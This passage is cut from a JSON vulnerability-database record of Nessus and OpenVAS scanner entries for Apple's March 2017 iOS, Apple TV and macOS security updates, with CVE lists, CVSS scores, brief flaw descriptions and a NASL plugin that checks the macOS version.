CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-02T00:00:00", "type": "nessus", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:apple_tv:*:*:*:*:*:*:*:*"], "id": "700035.PRM", "href": "https://www.tenable.com/plugins/nnm/700035", "sourceData": "Binary data 700035.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The remote host is running a version of Mac OS X version 10.x prior to 10.12.4 , and is affected by multiple vulnerabilities :\n\n - A format string flaw exists that is triggered as string format specifiers (e.g. %s and %x) are not properly used when handling IPP(S) links. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2017-2403)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API call. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. (CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context dependent-attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2485)\n\nAdditional flaws exist in the following components :\n\n - AppleGraphicsPowerManagement (CVE-2017-2421)\n - AppleRAID (CVE-2017-2438)\n - Bluetooth (CVE-2017-2420, CVE-2017-2427, CVE-2017-2449)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - CoreMedia (2017-2431)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - EFI (CVE-2016-7585)\n - Finderkit (CVE-2017-2429)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - Hypervisor (CVE-2017-2418)\n - iBooks (CVE-2017-2426)\n - IOATAFamily (CVE-2017-2408)\n - IOFireWireAVC (CVE-2017-2436, CVE-2017-2437)\n - IOFireWireFamily (CVE-2017-2388)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Intel Graphics (CVE-2017-2443)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2410, 2017-2440, 2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2489, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - libxslt (CVE-2017-2477)\n - MCX (CVE-2017-2402)\n - Menus (CVE-2017-2409)\n - Multi-touch (CVE-2017-2422)\n - nghttp2 (CVE-2017-2428)\n - QuickTime (2017-2413)\n - Security (2017-2451, 2017-6974)\n - SecurityFoundation (CVE-2017-2425)\n - sudo (CVE-2017-2381)\n - WebKit (CVE-2017-2392, CVE-2017-2457, CVE-2017-2486)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Mac OS X 10.x < 10.12.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2392", "CVE-2017-2457", "CVE-2016-7585", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-6974", "CVE-2017-2486"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700032.PRM", "href": "https://www.tenable.com/plugins/nnm/700032", "sourceData": "Binary data 700032.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The version of iOS running on the mobile device is prior to 10.3, and is affected by multiple vulnerabilities :\n\n - An unspecified state management flaw exists that may allow a context-dependent attacker to spoof the address bar. No further details have been provided. (CVE-2017-2376)\n - An unspecified flaw exists in the handling of HTTP authentication. This may allow a context-dependent attacker to display authentication sheets on arbitrary web sites and cause a denial of service. (CVE-2017-2389)\n - A flaw exists in the password-protected PDF export feature that is triggered as a weak encryption algorithm is used. This may allow an attacker with access to a password-protected document to potentially disclose the document content. (CVE-2017-2391)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API calls. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - DataAccess (CVE-2017-2414)\n - FontParser (CVE-2017-2406, CVE-2017-2407)\n - iCloud (CVE-2017-2397)\n - ImageIO (CVE-2017-2416)\n - iTunes Store (CVE-2017-2412)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2490)\n - libarchive (CVE-2017-2390)\n - Pasteboard (CVE-2017-2399)\n - Quick Look (CVE-2017-2404)\n - Safari (CVE-2017-2384, CVE-2017-2393, CVE-2017-2400)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2423", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2404", "CVE-2017-2389", "CVE-2017-2399", "CVE-2017-2453", "CVE-2017-2486", "CVE-2017-2412", "CVE-2017-2444", "CVE-2017-2397", "CVE-2017-2414", "CVE-2017-2434", "CVE-2017-2384", "CVE-2017-2393", "CVE-2017-2400", "CVE-2017-2452", "CVE-2017-2378", "CVE-2017-2424", "CVE-2017-2391"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700034.PRM", "href": "https://www.tenable.com/plugins/nnm/700034", "sourceData": "Binary data 700034.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-22T15:21:40", "description": "The version of Apple iOS running on the mobile device is prior to 10.3. It is, therefore, affected by multiple vulnerabilities in multiple components, the majority of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. The affected components are as follows :\n\n - Accounts\n - Audio\n - Carbon\n - CoreGraphics\n - CoreText\n - DataAccess\n - FontParser\n - HomeKit\n - HTTPProtocol\n - ImageIO\n - iTunes Store\n - JavaScriptCore\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - libxslt\n - Pasteboard\n - Phone\n - Profiles\n - Quick Look\n - Safari\n - Safari Reader\n - SafariViewController\n - Security\n - Siri\n - WebKit\n - WebKit JavaScript Bindings\n - WebKit Web Inspector", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-6976"], "modified": "2022-06-21T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_103_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/99127", "sourceData": "Binary data apple_ios_103_check.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:18", "description": "The remote host is running a version of macOS that is 10.12.x prior to 10.12.4. It is, therefore, affected by multiple vulnerabilities in multiple components, some of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. The affected components are as follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:apple:macos"], "id": "MACOS_10_12_4.NASL", "href": "https://www.tenable.com/plugins/nessus/99134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99134);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-3619\",\n \"CVE-2016-4688\",\n \"CVE-2016-5387\",\n \"CVE-2016-5636\",\n \"CVE-2016-7056\",\n \"CVE-2016-7585\",\n \"CVE-2016-7922\",\n \"CVE-2016-7923\",\n \"CVE-2016-7924\",\n \"CVE-2016-7925\",\n \"CVE-2016-7926\",\n \"CVE-2016-7927\",\n \"CVE-2016-7928\",\n \"CVE-2016-7929\",\n \"CVE-2016-7930\",\n \"CVE-2016-7931\",\n \"CVE-2016-7932\",\n \"CVE-2016-7933\",\n \"CVE-2016-7934\",\n \"CVE-2016-7935\",\n \"CVE-2016-7936\",\n \"CVE-2016-7937\",\n \"CVE-2016-7938\",\n \"CVE-2016-7939\",\n \"CVE-2016-7940\",\n \"CVE-2016-7973\",\n \"CVE-2016-7974\",\n \"CVE-2016-7975\",\n \"CVE-2016-7983\",\n \"CVE-2016-7984\",\n \"CVE-2016-7985\",\n \"CVE-2016-7986\",\n \"CVE-2016-7992\",\n \"CVE-2016-7993\",\n \"CVE-2016-8574\",\n \"CVE-2016-8575\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2016-9533\",\n \"CVE-2016-9535\",\n \"CVE-2016-9536\",\n \"CVE-2016-9537\",\n \"CVE-2016-9538\",\n \"CVE-2016-9539\",\n \"CVE-2016-9540\",\n \"CVE-2016-9586\",\n \"CVE-2016-9935\",\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10160\",\n \"CVE-2016-10161\",\n \"CVE-2017-2379\",\n \"CVE-2017-2381\",\n \"CVE-2017-2388\",\n \"CVE-2017-2390\",\n \"CVE-2017-2398\",\n \"CVE-2017-2401\",\n \"CVE-2017-2402\",\n \"CVE-2017-2403\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2408\",\n \"CVE-2017-2409\",\n \"CVE-2017-2410\",\n \"CVE-2017-2413\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2418\",\n \"CVE-2017-2420\",\n \"CVE-2017-2421\",\n \"CVE-2017-2422\",\n \"CVE-2017-2423\",\n \"CVE-2017-2425\",\n \"CVE-2017-2426\",\n \"CVE-2017-2427\",\n \"CVE-2017-2428\",\n \"CVE-2017-2429\",\n \"CVE-2017-2430\",\n \"CVE-2017-2431\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2436\",\n \"CVE-2017-2437\",\n \"CVE-2017-2438\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2443\",\n \"CVE-2017-2448\",\n \"CVE-2017-2449\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2467\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2477\",\n \"CVE-2017-2478\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2489\",\n \"CVE-2017-2490\",\n \"CVE-2017-5029\",\n \"CVE-2017-5202\",\n \"CVE-2017-5203\",\n \"CVE-2017-5204\",\n \"CVE-2017-5205\",\n \"CVE-2017-5341\",\n \"CVE-2017-5342\",\n \"CVE-2017-5482\",\n \"CVE-2017-5483\",\n \"CVE-2017-5484\",\n \"CVE-2017-5485\",\n \"CVE-2017-5486\",\n \"CVE-2017-6974\",\n \"CVE-2017-7070\"\n );\n script_bugtraq_id(\n 85919,\n 91247,\n 91816,\n 94572,\n 94650,\n 94742,\n 94744,\n 94745,\n 94746,\n 94747,\n 94753,\n 94754,\n 94846,\n 94968,\n 94972,\n 94975,\n 94977,\n 95019,\n 95076,\n 95077,\n 95078,\n 95375,\n 95764,\n 95768,\n 95774,\n 95783,\n 95852,\n 96767,\n 97132,\n 97134,\n 97137,\n 97140,\n 97146,\n 97147,\n 97300,\n 97301,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version of macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS that is 10.12.x prior to\n10.12.4. It is, therefore, affected by multiple vulnerabilities in\nmultiple components, some of which are remote code execution\nvulnerabilities. An unauthenticated, remote attacker can exploit these\nremote code execution vulnerabilities by convincing a user to visit a\nspecially crafted website, resulting in the execution of arbitrary\ncode in the context of the current user. The affected components are\nas follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nif (version !~ \"^10\\.12($|[^0-9])\") audit(AUDIT_OS_NOT, \"Mac OS 10.12.x\");\n\nfixed_version = \"10.12.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n xss:TRUE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-09-24T15:05:29", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207615", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2017-2486", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", "CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", 